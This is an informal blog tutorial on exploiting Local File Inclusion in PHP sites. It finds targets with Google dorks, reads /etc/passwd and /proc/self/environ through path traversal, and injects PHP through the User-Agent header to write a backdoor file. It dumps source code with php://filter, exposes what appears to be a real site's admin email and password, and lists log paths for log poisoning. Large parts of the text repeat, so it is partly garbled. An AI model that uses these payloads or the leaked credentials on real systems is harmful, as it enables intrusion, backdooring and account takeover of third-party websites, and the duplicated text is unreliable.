I Introduction
Hey guys today im gonna teach you LFI (Local File Inclusion).
II Learning Basics
So first we will now learn some basics
1) Google Dorks
what is google dorks?
Google dorks are used for easier searching like "inurl" "intext" like that
why do we need that?
No we dont need that, Just kidding ofcourse we need that to get target websites!
how do we use it?
so for example go to google and search: " inurl:index.php?page=news.php "
you'll see the results like www.website.com/index.php?page=news.php
So what's next?
2) LFI
Local File Inclusion is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application
IV Getting backdoor using LFI
So first, we will try to read /etc/passwd to see if its Directory Traversal
../ is used to go in upper directory / parent directory
www.website.com/index.php?page=/etc/passwd
www.website.com/index.php?page=../etc/passwd
www.website.com/index.php?page=../../etc/passwd
www.website,com/index.php?page=../../../etc/passwd (Worked!)
Next, we will not try to get the /proc/self/environ to execute PHP Scripts
www.website,com/index.php?page=../../../proc/self/environ (Worked!)
To check if it works you should see something like this
,
DOCUMENT_ROOT=/home/www/public_htmlGATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8HTTP_ACCEPT_ENCODING=gzip, deflateHTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5HTTP_CONNECTION=keep-aliveHTTP_HOST=localhostHTTP_USER_AGENT=Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0PATH=/bin:/usr/binPHPRC=/usr/local/lib/QUERY_STRING=page=../../../../proc/self/environREDIRECT_STATUS=200REMOTE_ADDR=182.68.251.152REMOTE_PORT=21007REQUEST_METHOD=GETREQUEST_URI=/?page=../../../../proc/self/environSCRIPT_FILENAME=/home/www/public_html/index.phpSCRIPT_NAME=/index.phpSERVER_ADDR=103.28.12.130SERVER_ADMIN= _NAME=localhostSERVER_PORT=80SERVER_PROTOCOL=HTTP/1.1SERVER_SIGNATURE=SERVER_SOFTWARE=ApacheUNIQUE_ID=U@e2lmccDCgAB3SNHk0AAAA
If you see something like 'HTTP_USER_AGENT=Mozilla' then you're good to go
it could execute php code when requested.
a) If you're using google chrome then its easier because you dont need to download any extensions/add-ons
Step 1) Press f12
Step 2) Click Toggle device mode
Step 3) Click responsive
Step 2) Click Toggle device mode
Step 3) Click responsive
Step 4) Click Edit
Step 5) Add custom device..
Step 6) Add any device name and we will edit the User Agent later
b) If you're using mozilla, download Live HTTP Headers or Tamper Data
So change the User Agent to <?php phpinfo() ?>
Then if you see phpinfo(), change the useragent to:
<?$file = fopen("shhacked.php","w");fwrite($file,"<?phpinfo()?>");fclose($file);phpinfo();?>
And now check www.website.com/shhacked.php
There ya go, Well done.
V Read files using LFI
Ok lets make this quick.
php://filter is a meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior the contents being read. We can read configuration/database.php , only PHP files using it
USAGE : php://filter/convert.base64-encode/resource=file name here
for example: https://icrpv5.org/index.php?page=php://filter/convert.base64-encode/resource=includes/process_login.php
you'll see a base64 encoded. Decode it in http://shunz19.blogspot.com/2016/04/string-tools.html
So if you decode it, you'll see "if ($email == "admin@icrpv5.org" AND $password == '2015icrpvB4L1')" Ez, the email is admin@icrpv5.org and password is 2015icrpvB4L1
VI Tips
If you use /proc/self/environ and it doesnt load
In order to perform a LFI log poisoning you need to be able to include the apache error or and access logs. Unfortuantly have been made "impossible" in newer versions of apache(the most used web server)
Some Common log Files:=>
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log
/var/www/logs/error_log
/var/www/logs/error.log
VII Goodbye
If you have some feedback and question please feel free to comment! thats all for now, bye!
Step 5) Add custom device..
Step 6) Add any device name and we will edit the User Agent later
b) If you're using mozilla, download Live HTTP Headers or Tamper Data
So change the User Agent to <?php phpinfo() ?>
Then if you see phpinfo(), change the useragent to:
<?$file = fopen("shhacked.php","w");fwrite($file,"<?phpinfo()?>");fclose($file);phpinfo();?>
And now check www.website.com/shhacked.php
There ya go, Well done.
V Read files using LFI
Ok lets make this quick.
php://filter is a meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior the contents being read. We can read configuration/database.php , only PHP files using it
USAGE : php://filter/convert.base64-encode/resource=file name here
for example: https://icrpv5.org/index.php?page=php://filter/convert.base64-encode/resource=includes/process_login.php
you'll see a base64 encoded. Decode it in http://shunz19.blogspot.com/2016/04/string-tools.html
So if you decode it, you'll see "if ($email == "admin@icrpv5.org" AND $password == '2015icrpvB4L1')" Ez, the email is admin@icrpv5.org and password is 2015icrpvB4L1
VI Tips
If you use /proc/self/environ and it doesnt load
In order to perform a LFI log poisoning you need to be able to include the apache error or and access logs. Unfortuantly have been made "impossible" in newer versions of apache(the most used web server)
Some Common log Files:=>
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log
/var/www/logs/error_log
/var/www/logs/error.log
VII Goodbye
If you have some feedback and question please feel free to comment! thats all for now, bye!
nice thx <
ReplyDelete